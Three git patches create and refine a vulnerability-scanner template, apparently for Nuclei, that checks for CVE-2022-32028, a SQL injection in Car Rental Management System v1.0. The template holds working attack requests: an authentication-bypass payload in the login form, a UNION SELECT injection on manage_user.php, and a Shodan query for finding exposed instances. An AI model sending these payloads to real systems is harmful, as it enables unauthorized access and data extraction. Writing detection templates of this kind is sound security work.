From d7c378d7a843d7848eb5e02c0c58c6b4fb074593 Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Mon, 1 Aug 2022 02:42:52 +0530 Subject: [PATCH 1/3] Create CVE-2022-32028.yaml --- cves/2022/CVE-2022-32028.yaml | 42 +++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 cves/2022/CVE-2022-32028.yaml diff --git a/cves/2022/CVE-2022-32028.yaml b/cves/2022/CVE-2022-32028.yaml new file mode 100644 index 0000000000..1c38ed2148 --- /dev/null +++ b/cves/2022/CVE-2022-32028.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-32028 + +info: + name: Car Rental Management System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32028 + metadata: + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: sql,cve,cms,2022 + +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin'+or+'1'%3D'1'%23&password=admin + + - | + GET /admin/manage_user.php?id=-1%20union%20select%201,database(),3,4,5--+ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'car_rental_db' + + - type: status + status: + - 200 From 23c6e7f4d24ea58d0d560ae8a947305957118511 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 1 Aug 2022 18:06:47 +0530 Subject: [PATCH 2/3] Update CVE-2022-32028.yaml --- cves/2022/CVE-2022-32028.yaml | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/cves/2022/CVE-2022-32028.yaml b/cves/2022/CVE-2022-32028.yaml index 1c38ed2148..b8f72a277a 100644 --- a/cves/2022/CVE-2022-32028.yaml +++ b/cves/2022/CVE-2022-32028.yaml @@ -7,25 +7,29 @@ info: description: | Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32028 + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 metadata: + verified: true shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: sql,cve,cms,2022 + tags: cve,cve2022,carrental,cms,sqli,authenticated + +variables: + num: "999999999" requests: - raw: +# Login bypass possible using a payload: admin'+or+'1'%3D'1' in username. - | POST /admin/ajax.php?action=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - username=admin'+or+'1'%3D'1'%23&password=admin + username={{username}}&password={{password}} - | - GET /admin/manage_user.php?id=-1%20union%20select%201,database(),3,4,5--+ HTTP/1.1 + GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded redirects: true max-redirects: 2 @@ -35,7 +39,7 @@ requests: - type: word part: body words: - - 'car_rental_db' + - '{{md5({{num}})}}' - type: status status: From 079f21a07eae4568d6d579f62d171a32affbaa76 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 2 Aug 2022 14:47:04 +0530 Subject: [PATCH 3/3] Update CVE-2022-32028.yaml --- cves/2022/CVE-2022-32028.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-32028.yaml b/cves/2022/CVE-2022-32028.yaml index b8f72a277a..3df3b33d91 100644 --- a/cves/2022/CVE-2022-32028.yaml +++ b/cves/2022/CVE-2022-32028.yaml @@ -12,6 +12,7 @@ info: metadata: verified: true shodan-query: http.html:"Car Rental Management System" + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. tags: cve,cve2022,carrental,cms,sqli,authenticated variables: @@ -19,7 +20,6 @@ variables: requests: - raw: -# Login bypass possible using a payload: admin'+or+'1'%3D'1' in username. - | POST /admin/ajax.php?action=login HTTP/1.1 Host: {{Hostname}} @@ -31,6 +31,7 @@ requests: GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 Host: {{Hostname}} + skip-variables-check: true redirects: true max-redirects: 2 cookie-reuse: true